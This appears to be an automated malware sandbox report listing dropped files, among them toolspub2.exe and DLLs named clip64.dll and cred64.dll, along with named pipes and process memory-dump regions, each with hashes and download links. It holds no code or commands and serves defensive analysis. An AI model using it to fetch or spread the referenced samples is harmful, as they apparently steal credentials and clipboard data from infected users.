SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp3AFA.tmp
Filesize
20KB

MD5
f3d115a39e520e1a07401d3c5120796b

SHA1
f265d73deffdaf708484523abd8161df9d67998c

SHA256
5661bf7d77029f414d4175bb7ec846d5541b0d1bf26c725a163268a78f998e5f

SHA512
374b659aaa773acb8e9040ea6792fefa1207a0bd17916a201f7aa4c73d2203e4a85f80a2efb5d6c78e6da5dc2447062703ab650d9c3b35902afe27dacd44503a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp3B4B.tmp
Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp3BA5.tmp
Filesize
96KB

MD5
d367ddfda80fdcf578726bc3b0bc3e3c

SHA1
23fcd5e4e0e5e296bee7e5224a8404ecd92cf671

SHA256
0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0

SHA512
40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

Download Submit
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
Filesize
239KB

MD5
cbc7a8ce71264b2c2c8568fd6ff6d93d

SHA1
16e53a3a1789b42dce33e1fb9d5b6476cc76dcf5

SHA256
10b9e6d04ea861b41718bc6ec5822e33500c7008c9f00c8c75d429d340068fc0

SHA512
c1a7040de751719d8dc335cca8d7c34411898d5b0c321668abdd059862dd566b4b58bdb9f997407d09dd7f7fb3a21a5061b4c1e4e45b57e7dccde6a7cc29759e

Download Submit
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
Filesize
89KB

MD5
e913b0d252d36f7c9b71268df4f634fb

SHA1
5ac70d8793712bcd8ede477071146bbb42d3f018

SHA256
4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da

SHA512
3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

Download Submit
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll
Filesize
273B

MD5
a5b509a3fb95cc3c8d89cd39fc2a30fb

SHA1
5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c

SHA256
5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529

SHA512
3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

Download Submit
C:\Users\Admin\AppData\Roaming\aca439ae61e801\clip64.dll
Filesize
102KB

MD5
8da053f9830880089891b615436ae761

SHA1
47d5ed85d9522a08d5df606a8d3c45cb7ddd01f4

SHA256
d5482b48563a2f1774b473862fbd2a1e5033b4c262eee107ef64588e47e1c374

SHA512
69d49817607eced2a16a640eaac5d124aa10f9eeee49c30777c0bc18c9001cd6537c5b675f3a8b40d07e76ec2a0a96e16d1273bfebdce1bf20f80fbd68721b39

Download Submit
C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll
Filesize
1.2MB

MD5
0111e5a2a49918b9c34cbfbf6380f3f3

SHA1
81fc519232c0286f5319b35078ac3bb381311bd4

SHA256
4643d18bb8be79c2e3178bc3978d201c596ab70a347e8cf1e8fdbe3028d69d7c

SHA512
a2aac32a2c5146dd7287d245bfa9424287bfd12a40825f4da7d18204837242c99d4406428f2361e13c2e4f4d68c385de12e98243cf48bf4c6c5a82273c4467a5

Download Submit
\??\pipe\LOCAL\crashpad_1792_SDLFCJABGTABRFHM
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_4616_TTZWCWXYOTBQCSEA
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_4728_VQHCZLFFFLOUHUQG
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2176-131-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/2176-132-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/2176-128-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/2176-134-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/2316-436-0x00007FFF5DFC0000-0x00007FFF5EA81000-memory.dmp

Filesize
10.8MB

Download
memory/2316-571-0x000000001BB60000-0x000000001BB70000-memory.dmp

Filesize
64KB

Download
memory/2316-400-0x0000000000E40000-0x0000000000E48000-memory.dmp

Filesize
32KB

Download
memory/2316-451-0x000000001BB60000-0x000000001BB70000-memory.dmp

Filesize
64KB

Download
memory/2316-562-0x00007FFF5DFC0000-0x00007FFF5EA81000-memory.dmp

Filesize
10.8MB

Download
memory/2316-678-0x00007FFF5DFC0000-0x00007FFF5EA81000-memory.dmp

Filesize
10.8MB

Download
memory/2332-155-0x0000000007B70000-0x0000000007B80000-memory.dmp

Filesize
64KB

Download
memory/2332-339-0x0000000007B70000-0x0000000007B80000-memory.dmp

Filesize
64KB

Download
memory/2332-327-0x00000000742A0000-0x0000000074A50000-memory.dmp

Filesize
7.7MB

Download
memory/2332-139-0x00000000742A0000-0x0000000074A50000-memory.dmp

Filesize
7.7MB

Download
memory/2332-140-0x0000000000BB0000-0x0000000000BEC000-memory.dmp

Filesize
240KB

Download
memory/3240-690-0x0000000000400000-0x000000000041A000-memory.dmp

Filesize
104KB

Download
memory/3240-696-0x0000000000400000-0x000000000041A000-memory.dmp

Filesize
104KB

Download
memory/3268-42-0x0000000003100000-0x0000000003116000-memory.dmp

Filesize
88KB

Download
memory/3268-572-0x0000000002C70000-0x0000000002C86000-memory.dmp

Filesize
88KB

Download
memory/3308-65-0x00000000742A0000-0x0000000074A50000-memory.dmp

Filesize
7.7MB

Download
memory/3308-32-0x00000000742A0000-0x0000000074A50000-memory.dmp

Filesize
7.7MB

Download
memory/3308-28-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/3308-74-0x00000000742A0000-0x0000000074A50000-memory.dmp

Filesize
7.7MB

Download
memory/3324-243-0x00000000742A0000-0x0000000074A50000-memory.dmp

Filesize
7.7MB

Download
memory/3324-135-0x0000000007070000-0x0000000007080000-memory.dmp

Filesize
64KB

Download
memory/3324-129-0x0000000000090000-0x00000000000CC000-memory.dmp

Filesize
240KB

Download
memory/3324-130-0x00000000742A0000-0x0000000074A50000-memory.dmp

Filesize
7.7MB

Download
memory/3324-298-0x0000000007070000-0x0000000007080000-memory.dmp

Filesize
64KB

Download
memory/3564-70-0x0000000007AB0000-0x0000000007AC2000-memory.dmp

Filesize
72KB

Download
memory/3564-76-0x00000000077B0000-0x00000000077C0000-memory.dmp

Filesize
64KB

Download
memory/3564-67-0x00000000077B0000-0x00000000077C0000-memory.dmp

Filesize
64KB

Download
memory/3564-68-0x00000000088F0000-0x0000000008F08000-memory.dmp

Filesize
6.1MB

Download
memory/3564-69-0x0000000007B80000-0x0000000007C8A000-memory.dmp

Filesize
1.0MB

Download
memory/3564-56-0x0000000007D20000-0x00000000082C4000-memory.dmp

Filesize
5.6MB

Download
memory/3564-49-0x0000000000400000-0x000000000043E000-memory.dmp

Filesize
248KB

Download
memory/3564-71-0x0000000007B10000-0x0000000007B4C000-memory.dmp

Filesize
240KB

Download
memory/3564-72-0x0000000007C90000-0x0000000007CDC000-memory.dmp

Filesize
304KB

Download
memory/3564-55-0x00000000742A0000-0x0000000074A50000-memory.dmp

Filesize
7.7MB

Download
memory/3564-66-0x00000000078E0000-0x00000000078EA000-memory.dmp

Filesize
40KB

Download
memory/3564-57-0x0000000007810000-0x00000000078A2000-memory.dmp

Filesize
584KB

Download
memory/3564-75-0x00000000742A0000-0x0000000074A50000-memory.dmp

Filesize
7.7MB

Download
memory/4160-34-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/4160-33-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/4160-35-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/4160-37-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/4728-44-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/4728-41-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/5144-230-0x00000000742A0000-0x0000000074A50000-memory.dmp

Filesize
7.7MB

Download
memory/5144-458-0x00000000742A0000-0x0000000074A50000-memory.dmp

Filesize
7.7MB

Download
memory/5144-234-0x0000000000500000-0x0000000001190000-memory.dmp

Filesize
12.6MB

Download
memory/5264-1085-0x0000000000400000-0x00000000004CF000-memory.dmp

Filesize
828KB

Download
memory/5520-693-0x00007FFF5DFC0000-0x00007FFF5EA81000-memory.dmp

Filesize
10.8MB

Download
memory/5520-694-0x0000025677130000-0x0000025677140000-memory.dmp

Filesize
64KB

Download
memory/5520-695-0x0000025677130000-0x0000025677140000-memory.dmp

Filesize
64KB

Download
memory/5520-706-0x00000256770E0000-0x0000025677102000-memory.dmp

Filesize
136KB

Download
memory/5608-846-0x0000000000400000-0x00000000007CD000-memory.dmp

Filesize
3.8MB

Download
memory/6108-1224-0x0000000000400000-0x00000000007CD000-memory.dmp

Filesize
3.8MB

Download
memory/6108-1205-0x0000000000400000-0x00000000007CD000-memory.dmp

Filesize
3.8MB

Download
memory/6108-1151-0x0000000000400000-0x00000000007CD000-memory.dmp

Filesize
3.8MB

Download
memory/6108-1112-0x0000000000400000-0x00000000007CD000-memory.dmp

Filesize
3.8MB

Download
memory/6108-1090-0x0000000000400000-0x00000000007CD000-memory.dmp

Filesize
3.8MB

Download
memory/6384-376-0x00000000742A0000-0x0000000074A50000-memory.dmp

Filesize
7.7MB

Download
memory/6384-334-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/6384-480-0x0000000008110000-0x0000000008176000-memory.dmp

Filesize
408KB

Download
memory/6384-537-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/6384-387-0x0000000007570000-0x0000000007580000-memory.dmp

Filesize
64KB

Download
memory/6384-556-0x00000000742A0000-0x0000000074A50000-memory.dmp

Filesize
7.7MB

Download
memory/6384-336-0x00000000020D0000-0x000000000212A000-memory.dmp

Filesize
360KB

Download
memory/6384-561-0x0000000007570000-0x0000000007580000-memory.dmp

Filesize
64KB

Download
memory/6504-550-0x0000000000800000-0x0000000000900000-memory.dmp

Filesize
1024KB

Download
memory/6504-634-0x0000000000910000-0x0000000000919000-memory.dmp

Filesize
36KB

Download
memory/6504-551-0x0000000000910000-0x0000000000919000-memory.dmp

Filesize
36KB

Download
memory/6996-322-0x00000000742A0000-0x0000000074A50000-memory.dmp

Filesize
7.7MB

Download
memory/6996-718-0x0000000006770000-0x0000000006932000-memory.dmp

Filesize
1.8MB

Download
memory/6996-547-0x0000000005290000-0x00000000052A0000-memory.dmp

Filesize
64KB

Download
memory/6996-494-0x00000000742A0000-0x0000000074A50000-memory.dmp

Filesize
7.7MB

Download
memory/6996-311-0x0000000000900000-0x000000000091E000-memory.dmp

Filesize
120KB

Download
memory/7132-549-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/7132-552-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/7132-573-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/7172-449-0x0000000000B40000-0x0000000000B41000-memory.dmp

Filesize
4KB

Download
memory/7172-875-0x0000000000400000-0x0000000000965000-memory.dmp

Filesize
5.4MB

Download
memory/7172-563-0x0000000000B40000-0x0000000000B41000-memory.dmp

Filesize
4KB

Download
memory/7688-1082-0x00007FF68D5E0000-0x00007FF68DB81000-memory.dmp

Filesize
5.6MB

Download
memory/8172-881-0x0000000000400000-0x0000000000D1B000-memory.dmp

Filesize
9.1MB

Download
memory/8172-679-0x0000000002F00000-0x00000000037EB000-memory.dmp

Filesize
8.9MB

Download
memory/8172-555-0x0000000002F00000-0x00000000037EB000-memory.dmp

Filesize
8.9MB

Download
memory/8172-548-0x0000000002AF0000-0x0000000002EF1000-memory.dmp

Filesize
4.0MB

Download
memory/8172-1186-0x0000000000400000-0x0000000000D1B000-memory.dmp

Filesize
9.1MB

Download
memory/8172-632-0x0000000000400000-0x0000000000D1B000-memory.dmp

Filesize
9.1MB

Download
memory/8172-633-0x0000000002AF0000-0x0000000002EF1000-memory.dmp

Filesize
4.0MB

Download